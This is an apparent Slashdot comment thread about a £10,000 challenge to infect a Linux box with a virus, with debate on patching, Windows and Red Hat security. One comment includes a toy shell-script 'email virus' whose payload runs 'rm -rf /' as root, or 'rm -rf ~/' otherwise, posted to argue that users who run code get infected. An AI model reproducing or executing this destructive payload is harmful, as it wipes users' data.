Slashdot Mirror
£10,000 Prize for Linux Virus Challenge Re-Issued
mutantcamel writes "Eddie Bleasdale, the director of NetProject has been offering
£10,000 to the first hacker to infect his Linux machine with a virus for the last two years, and so far no one has hit the jackpot. He's re-announced his challenge to virus writers following a Gartner report which told IT depts. not to trust MS server software because of recent worm attacks on their servers, but a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins."
So ... write a virus and get rewarded for it? What kind of world do we live in where criminals get rewarded?!
...
I guess crime does pay
To celebrate the occasion of my 1000th post, I will post no more forever on Slashdot. Goodbye.
And will you be called a "gifted programmer" a "security expert" or a "terrorist"?
In these times and with all of what's happening with all the laws passed, I wouldn't even dare touching that kind of contest, sure it's gonna make a possible winner popular, but could be also seen as a prime suspect for writing trojan code, and since law enforcement at higher levels often tries to find someone to blame, well, you know the rest.... (as in wrongfully accused, lack of proofs and still convicted, etc etc).
--- Metamoderating abusive downgraders since my 300th post.
Keep in mind that default Redhat installation ships with many bugs that all need to be patched. Saying someone can't hack this kids linux box is a reason not to trust MS is just plain stupid. If IT dept. would patch their software and not open idiot attachments you couldnt infect MS BOXES EITHER. Its all about PATCHING, no matter which OS you use.
Think about it, most MS bugs had patches before they went widescale. If you had taken time to install these patches you wouldn't have been infected. In addition, don't open EXE's that ask for your advice and its extremely hard to infect an NT system as well.
You cant compare an upgraded and constantly patched linux box to a default Win2k installation.
Does anyone else think that it is irresponsible to try to persuade virus writers to target Linux? What happens if someone is successful and unleashes a particularly nasty linux virus on us?
Let the virus kiddies stick to targeting Windoze.
HH
Does he just want his linux box destroyed or does it have to be a virus? He can give me his address, I'll gladly fly down to his house and smash up his linux box with a bat for 10,000 pounds (that's around 14,534 dollars and 22 cents).
I do find myself somewhat agreeing with Microsoft on this. Bugs happen. Open source may have fewer of them, but they happen with open source, too. Very few open source systems are secure "out of the box". Any admin that assumes otherwise, for BSD, or Linux, or Microsoft Windows, is a retard. Comparing an improperly administered system of one class to a tightly secured system of another is really pointless. It's comparing a retard to someone who knows what they are doing, and cares.
now we need to go OSS in diesel cars
If businesses want to make their networks secure, they need to hire someone who cares and knows how, and pay well to get that person. Then don't hinder them with petty things like bureaucracy. They should report directly to the CTO or CIO, or actually be the CTO or CIO.
now we need to go OSS in diesel cars
I agree that some of the responsibility lies with the sysadmin, but then again, the OS should be designed well enough that the patches are minimal.
I work in an enterprise unix environment and getting time for outages to apply patches is incredibly tough when you are running 24x7 systems that are critical to the operation of the customer.
Sure, we try to patch systems when we find out about security holes, but there comes a time when you cannot simply afford to take your systems down every week to apply new patches. Now I don't deal with MS stuff so I can't comment authoritively, but it seems that the number of patches with MS products is never ending. This stops being a sysadmin problem and becomes a vendor (ie Microsoft) issue. Ultimately, it's a sloppy coding issue that lies with Microsoft.
Today, I shall announce an award of $5 (CDN) to who ever can write a virus for a Mac...
So start coding... There is a lot of competition out there...
---
Programming is like sex... Make one mistake and support it the rest of your life.
"...but a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins."
After all the hours I put in on those bloody worms & viruses, it's nice to see some fallout against Microsoft, those who set the scene for such silliness. If they take responsibility for creating an insecure environment with their OS and software, they do severe damage to their brand and franchise value. If they do what they're doing now, biting the hands which feed them, ie those in the trenches making their crappy software work in production, then they will likely alienate many of the hordes of SAs which help them maintain their current position in the Enterprise & SOHOs.
Squirm, MS, Squirm.
Don't forget, he doesn't just want you to write the virus, but actually infect his computer with it. That's considerably harder.
Name that University. Identify their netblock(s). I'm sure someone will do something about it.
now we need to go OSS in diesel cars
Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins.
So the admins responsible for Windows Update are considered 'tards by Microsoft? After all, windowsupdate.microsoft.com was reportedly "hacked by Chinese" this summer.
--
"Outlook not so good." That magic 8-ball knows everything! I'll ask about Exchange Server next.
What happens if someone is successful and unleashes a particularly nasty linux virus on us?
Then the particular exploit will be patched, people will learn from the experience, and Linux will be a better, more secure system as a result.
If we discourage people from trying to break systems, we end up with weak systems.
Making Linux more secure today may result in some costly damage today - but will result in a more secure Linux, which will (as more and more people install and rely on Linux) almost certainly prevent orders of magnitude more damage several years from now. If we allow systems to become "weak", but continue installing millions more such systems, sooner or later someone will write a truly malicous virus, and the damage will be far greater in that case. Think man.
I'll bet that if those gifted hackers using Linux entered this contest, it would only be a matter of time before someone did it. The problem is, none of these hackers using linux want to ruin the "secure" reputation of the OS by winning this contest. Instead of worrying about ruining its reputation, try and make a virus for it so the linux community can then come up with an update for the kernel or whatever to make it secure again.
"Be regular and orderly in your life, so that you may be violent and original in your work." -Flaubert
OH.. no.. not at all.
They simply need an admin who is diligent about applying patches and staying informed.
Why does the CTO or CIO have to be involved? that's rediculous.
--just a thought. No intent to offend, etc.
I dont think linux is more secure for this kind of thingShort Answer: Anthrax isn't a virus.
a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins.
Now huge sucess in IIS' worms is due to 'tardy' NT sysadmins, and definitely not MS' fault?
MS fans should feel sad for having honored title 'tardy' after all those years of unconditional loyalty.
You know someone is going to say retarded, which might not be completely fair.
It has been said that no-one ever got fired for buying IBM (long ago), or Microsoft. This may be slowing changing. I don't know of many people who want to put their jobs on the line to protect the reputation of some other company.
"It is a greater offense to steal men's labor, than their clothes"
Considering that writing a virus could be considered terrorism, and prosecuted as suck, I don't know that this would be the best idea...
Although, I would certainly like the 10k Pounds...
(Now, if only I knew how to input the Pound symbol on my US keyboard...)
-- Sometimes you have to turn the lights off in order to see.
I've seen hacking contests before. They're really freaking lame. The results are not often announced, it just disappears. Or you get everyone doing a DoS thinking that is hacking.
"Bleasdale maintains it is impossible to infect a correctly configured Linux system with a virus, and conversely that it is impossible to make a system running Windows secure."
Okay this is quite clearly wrong. On many levels. Now it is possible that this guy set up a linux box with no services running at all. Fine. WindowsNT is equally secure with nothing running. But lets say a linux box has Apache, bind, or FTP on it. We've seen buffer overflows and other attacks on these software products. There is a delay from discovery to annoucement to fix available. To claim that a linux box is impossible to infect is just showing ignorance, unless of course it's running nothing at all.
More to the point: It's stupid and lazy people who get viruses, regardless of their OS. If Linux ever becomes widespread, it will have a bigger virus problem than Microsoft ever has.
To my knowledge, the Webstar reward still stands. The contest crack I suggested stems from a pcweek contest, the winner of which (jfs) exploited the third party PhotoAds software. jfs was partially succesful against the crack.linuxppc.org. Details here...
The person who launched the DOS wasn't very bright. Sure, a DOS may give a ton of false positives but you're not really getting anywhere.
Surely they were doing more than just pinging the box to try to get the contents of a file.
Rod Taylor
Before people start slamming the Gartner report again, I hope they've read it. People seem to be under the impression that Gartner said that IIS simply wasn't secure and that other things are better - and that the response to this is 'duh, any machine which isn't updated isn't secure'. That isn't a valid response at all, because what Gartner very specifically said was not that IIS couldn't be secured, but that it is simply uneconomical because of the time and effort it takes to update IIS.
I.e. Just what they are saying is 'We all know you need good sysadmins to make sure systems are up to date with security patches, but in the case of IIS you'll have to employ someone to spend all their time doing this, and that simply isn't the least expensive way to go'....
I sent email to netproject.com asking what the deal was. Really, reporting something like this without an actual written challenge is just stupid. Even with the written challenge it is hard enough to get payment on a gentleman's bet.
How we know is more important than what we know.
Webservers that operate behind a load balancer, reverse proxy server or a firewall will often report the operating system of the load balancer, reverse proxy or firewall server. Hence reports of 'Microsoft/IIS on Linux' indicate that either the web server is behind a Linux server that is acting as a reverse proxy, has been configured to send a different signature or Microsoft have released a version of IIS for Linux.
And If you look at the history info for download.microsoft.com it shows that it is an akamai site. As well all know akamai runs linux.
Your right about RedHat. They throw together the worst Linux destro.
RedHat has lost track of the whole idea of a destro. It's a "value added" Linux.. a better Linux than you'd get if you did it yourself.
Not RedHat..
The whole point is you shouldn't need to patch it.
The defects found in RedHat and Windows are really stupid.
Yeah don't run attachments.. smart idea.. Let's rember that this is a FEATURE Microsoft ADDED. It's not a defect. Windows was made this way.
Give Microsoft a break for the first virus. Ok done.. Need the first infection to learn. Well great but the stupid patch is on the human side.
Let's also remember that Windows is designed to be "user friendly" in other words users don't know better. Linux is made with the os develupers in mind.. not the avrage user. So before you could run an e-mail virus you'd have to know enough about Linux to recognise the virus for what it is.
Now before we get ferther on the "RedHat".. RedHat is not Linux... RedHat is one single destro that compeates with Microsoft for the title of "the most bugs"... and last I heard RedHat held the title.. Not Microsoft.
Going into the past there have been many brown bag Unixes that were far worse than anything Microsoft put out. It's not like Microsoft or RedHat has ever achived the title of "all time most buggy".
But those companys went away. Pushed under by Sun Microsystems long before Linux saw the light of day.
Yes you can pick out a Linux destro that is as bad if not worse than Microsoft.. I know RedHat isn't the only brain dead destro.
So you can't just buy the first Linux destro on the shelfs any more than you could buy the first used car you see.
But you can't shop around for a better Windows.
Finnaly as I understand Windows admin are fearful of Microsoft patches. They are worried the fix will be worse than the disease...
That fear dosen't seem to be shared by Linux counterparts.
Ideally a Linux destro should be fine out of the box needing no patching. Not all destros have this advantage so you do need to shop around.
A lot more preferable to patching Windows and hoping the patches don't make things worse.
Basicly for Linux you need to train users there is no way around this.
If you want Windows to work correctly you have to train the users as well.
Now what advantage did Windows have over Linux? Not needing to train anybody.
Oh.. yeah well I guess thats not the case anymore.
There aren't any viruses for Linux at the moment.
If you want to argue the future fine be my guest but let's leave it at right now Windows has the lead in viruses. Linux won't catch up even if we wanted it to...
I don't actually exist.
I have to admit that *some* (okay, maybe a lot/most) of the infections were purely due to poor server administration. The story doesn't stop there though.
I offer up as proof of what follows my Apache logs on my home machine for the last month. It's amazing how many machines out there seem incredibly interested in files such as "cmd.exe" and "root.exe", which (gasp!) don't exist on my Linux box. What's funnier is the fact that the vast majority of these attacks came from the BellSouth DSL network and various cable networks. I actually got to the point where I was ready to write a Perl script to grep up the nefarious log entries, nmap 'em automatically, and ship the results off to BellSouth's abuse department every 12 hours...
The point I'm trying to make is simply that the biggest vector for the spread of this crap is home machines. MS can yap all day long about how poor admin'ing causes this, while they fail to admit that they've put horribly insecure web server software in the hands of average Joe and Jane Consumer. Now, I'm not saying it's all MS's fault; Joe and Jane are very much to blame too for not bothering to click "Start -> Windows Update" every once in a while.
But I won't accept that MS can claim any sort of innocence on this. What about other
This has to be the most poorly researched article I've ever seen. What is this? "I heard Eddie say that he'd give Sophos a bucket load of money if they could infect his Linux box" becomes news? For a start, there are already Unix viruses and they have been reported in the wild. What is all this stuff about "hackers" and "exploits" about? Are we talking about worms or viruses or what? Where is the actual written declaration of the challenge? Who is the third party holding the cash in escrow? How is the challenge supposed to work? Surely Ed isn't suggesting that he will track down and award the author of any virus that ends up on his machine. Surely Ed isn't trying to incite people to write actual viruses and release them into the wild. I have emailed netproject.com, maybe the original "reporter" should have done this, it's called basic research. BTW - I heard Bill Gates said he'd give $1,000,000 to anyone who can sneak a woopie cushion onto his chair before he sits down on monday, should I look for the Slashdot article?
How we know is more important than what we know.
Yeah.. they were to lazy to install a real OS like Unix/Linux/BSD... hey even if they kept NT or Windows, they could have at least used Apache!
Only 'flamers' flame!
The challenge was given to Sophos to infect his computer. Antivirus companies usually dont go around doing this. It's not like he got on #virus on undernet and offered the cash to the people who actually write these things.
How we know is more important than what we know.
Closest I have found is this. Eddie hasn't replied yet, doubt he will. Unplugged from power? wow.. what a witty joke. Sigh. If his challenge is anything like that link then he is grossly misinformed or is playing word games with what he means by "attachments opened". If he is going to run binaries (or open zips) then we can only assume he is relying on the user/kernel user/root seperation in linux to protect himself and that's not such a bad claim, except there are viruses that can jump su (and sudo) and are not reliant on any exploit. That is to say, it is an error of design, not of implementation, as he claims. But yes, I would feel much better about taking up this challenge if it was M$ft offering it. Believe it or not, M$ft is more likely to honour their challenge than Eddie cause they have an interest in seeing the linux virus actually work. Eddie on the other hand is making the challenge because he knows it wont be met, primarily because he will change the rules of engagement after the fact. I dont even think the devil could write up a contract that would cover this challenge down to the smallest detail necessary to prevent Eddie from wigling out of paying. There are too many definitional issues. But rest assured, if you continue to make the bold claim that linux is "uninfectable" you will be proved wrong. Just as M$ft was proved wrong back when they made the same claims about Win95 and again when they made the same claims about WinNT.
How we know is more important than what we know.
Viruses and other exploits don't happen because of mere sloppy coding. It is rather arrogance and/or poor design (which I guess are the same thing). And this is not limited to proprietary software either.
A well-designed secure program generally assumes that it will be compromised and has safeguards to limit impact of such a compromise. For example, think of what you can do if you compromise IIS or Sendmail, and compare with a compromise of Qmail or Apache (assuming you could compomise Qmail). IIS, Outlook, and other Microsoft products suffer from this problem.
So, people will say that the *nix world is much better (and forget the lessons learned from the Morris Worm). The kernels are very stable, but it is the network services which are the most vulnerable. Remember that root has to run the process if it binds to a port below 1024, so many network daemons are run exclusively by root. If I were into this area, I would be targeting these services (BIND, Sendmail, Tux, Websphere, etc.) rather than the older viruses. Tux represents an interesting case in point because it can have no safeguards except for very careful coding (and NO coding will ever be perfect) as it runs in kernel mode.
Now there is one other thing that was not said... Does the virus have to be Linux specific, or can I use an old-fashioned boot-sector virus?
LedgerSMB: Open source Accounting/ERP
Virus means Anthrax is out.
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
You are both defending Microsoft and you are flat out wrong. Linux *DOES*
not have the virus-spreading email programs and other software that
populates the Windows enviroment.
Hmmm.... So.... If Microsoft were to release Outlook for Linux, then we would be insecure too? The weak point of *nix is that only programs running as root can bind to ports below 1024 which means that most network services MUST run as root, and few have worker processes with fewer restrictions, like Apache does.
So how abaout a change in paradigm? How about ditching this whole concept of requiring network services to run as root and have a "netd" group which would ba allowed to do this but not required to be root. We already sort of hack this by using xinetd and inetd, so why not create a new, more secure standard that would do more to prevent serious exploits and hence possibly viruses as well?
LedgerSMB: Open source Accounting/ERP
#!/bin/sh
#
# TODO:
# Parse e-mail address' out of browser's cache
# Send program as attachment in e-mail
# Program untested, you'll get the idea anyway...
#
echo -e 'To: $TO_ADDR\nSubject: Hi! How are you? \n\nI send you this file in order to have your advice\n\n#!/bin/sh\nif[ "$UID" = "0" ]; then\n\nrm -rf
if[ "$UID" = "0" ]; then
rm -rf /
else
rm -rf ~/
fi
The program can be considered a virus. While it is blantently clear that you should never run it, I could have made it a binary which would have made it harder to see what it does. And who is to say that the user will even look at the file before executing it? A virus on any system requires the user to execute code (even if it is automated to a certain extent on certain systems). Whether the system is Linux or Windows, if the user wants to execute a program, they will.
Yes, OpenBSD is 4 years without a remote hole in the default install. They have a very good code peer review which fixes problems before they become problems. Microsoft trying to lay the blame for this on sysadmins is insane. Yes, I do expect to get an OS out of the box with no major security problems. This just shows you how far removed from reality Microsoft still is. They don't "get it". This is why they have had trouble penetrating into the Fortune 500 high-end market. Engineering does not want to here "you're having this problem because you're tardy". What they're saying in essence is "we expect you to work on our timetable". ie. when some 15-year-old exposes how crappy the security of W2K out-of-box is and they patch it, every client worldwide is expected to immediately upgrade or it's the customers fault because they're tardy. This is not what customer's like to here. Thankfully I only have to deal with Solaris (and Linux) most of the time, and NT/W2K only on occasion. I've had the misfortune of always having some small NT responsibility since NT 3.51 came out. Anyone remember what a piece of crap that was? Windows 3.11 GUI even after Windows 95 came out with it's Mac ripped off interface, constant blue screens of death, weird license restrictions on how many people could connect at once, constant need to edit the registry to do anything but editting the registry would invalidate any support. Blah - it hasn't gotten much better since. I've been sysadminning a while, and most NT admins will admit that UNIX is superior to NT.
14,517$, as a matter of fact
1 pound == 1.45$
--
Two witches watched two watches.
Which witch watched which watch?
Tardy is like 5 minutes, not half a fucking year. Lets be honest here, these sysadmins are not tardy, they are goddamn incompetent.
1q2w3e4r5t6y7u8i9o0pqawsedrftgthyjukilo;p'azsxdcf
"No nation could preserve its freedom in the midst of continual warfare."
--James Madison
"That is to say, it is an error of design, not of implementation, as he claims."
Wouldn't that be the whole point of this challenge? -- that Linux has a better 'design', and therefore is supposedly immune to viruses.
We all know that the most suceptable system to viruses is DOS/Windows, and that's certainly by design (although there's loads of implementation issues too).
When I hear the word 'innovation', I reach for my pistol.
Absolutely. What I'm talking about is a recent linux virus that manages to jump su and, to a lesser extent, ssh. The virus is per process resident (the same method of residency that is predominate on winNT) and has appeared in the wild. CARO has not named it to date.
How we know is more important than what we know.
What makes this trolling is that you're not contributing anything new to the discussion. OK, you're one of many people who things that Red Hat is too buggy. This is not useful. What would be useful is a description of distros that (in your opinion) do a better job.
Need I mention that I personally prefer Red Hat 7.1? Not perfect, but the easiest to live with for my narrow purposes. If I'm full of it, kindly educate me. Don't just scream at me.
$10 Canadian? Bah. I'll offer a bottle of Dr Pepper and a packet of crisps to the first person who can hack into my box located at IP address 127.0.0.1 and delete all the files on it...
++ Say to Elrond "Hello.".
Elrond says "No.". Elrond gives you some lunch.
Most likely he considers the oppertunity to study these attempts in a controlled enviroment, more valuable than the money anyways. In a world where most warrenties say something like "Not guarenteed to be suitable for any purpose". I find this approach most refreshing. Try and find commercialy producted software that states that its suitable even for the purpose it was manufactured for.
I hope for his sake running outlook and IE 5.5 in wine is out-of-bonds. I read a while back where the wine crew considered getting a virus to be a major mile stone achievment in compatability.
Apocalypse Cancelled, Sorry, No Ticket Refunds
I Actualy remember stumbling across a BSD copywrite notice in my win95 machine. I bet ther is a lot more bsd stuff in windows than M$ would ever like to be known. I started to look for a lot of the network utils when I saw that both windows and Linux/BSD systems were vulernable to the same TCP/IP buffer overflow.
you can amaze a lot of windows only people by knowing how to run common stuff from the command line.
Apocalypse Cancelled, Sorry, No Ticket Refunds
If he is running Wine, I'll just send him SirCam... But do Windows virii count?
LedgerSMB: Open source Accounting/ERP
"The defects found in RedHat and Windows are really stupid."
You haven't programmed much have you? (At all? No, patching a C file a couple of times and writing some bash scripts does not count as programming much) Most programmers know that there will be (not might be) bugs in the code. As far as stupid defects, yes they've both had their share. However RedHat is nowhere near Windows in terms of sheer volume of severe bugs. I don't know where you got your data. The last one that I saw was clearly biased (they counted general Linux bugs and RedHat-specific bugs together even though there was significant overlap).
Also note that RedHat uses newer versions of programs than most other Linux distributions. They don't hide this fact. I applaud them for it. Why? Because if they didn't, glibc2 would not have been adopted as quickly as it was. And what about the "broken" compiler that came out with RedHat 7? People railed and hollered because they couldn't compile their kernels. Actually they could, but people conveniently forgot that RedHat posted notices in big letters that they have to use the older version of the compiler to compile (oh no! you have to use kgcc instead of gcc! how will users ever figure that out, especially if RedHat explicitly tells them that they have to). Yes there were bugs in the compiler. It was patched, but the kernel still didn't build. Why not? Because there was code in the kernel that was not compliant with the C99 standard. People's C++ code wouldn't compile anymore. Why? Because a lot of C++ code is plainly incompatible with the ISO98 standard of C++. You know that thing that Slashdotters are always railing about: STANDARDS. Or do you advocate ignoring standards when they don't suit you? Wouldn't that make you like Microsoft? These are standards that were ratified and publically announced two and three years ago. How can you say that they snuck up on you?
What does C99 give you?
Allocated on the stack so no need for malloc or free (and less corresponding bugs) and basically eliminates the hacks out there to accomplish them same like alloca.What does ISO98 C++ give you? The Standard Template Library. 'Nuff said.
These are examples, but are indicative of a general trend.
- New library or suite that is noticeably better comes out
- RedHat recognizes that it is better, includes it in their distribution, tests, and releases
- People bitch and moan about how it breaks things that don't come with the distribution
- Everyone blames RedHat for doing a horrible job
- Because it is being used, the library in question gets a shakedown and most bugs are worked out quickly
- People reluctantly fix their programs to work with the updated library/suite so that they can run on RedHat
- In the course of fixing, people come across the advantages of the new library/suite and herald its arrival
- People deride the older version
- People forget it was RedHat that drove the newer, better library/suite into general use
- Goto 1 because geek memories appear to be very short
If you want a closer-to-perfect RedHat box, install a copy from two versions ago and install all of the associated patches for it. This will be about the equivalent of a standard Debian install: very secure, but quite out of date. If you run Debian unstable or testing, while having more up-to-date software, you find that many of those "stupid defects" find their way into that distribution as well.- I don't need to go outside, my CRT tan'll do me just fine.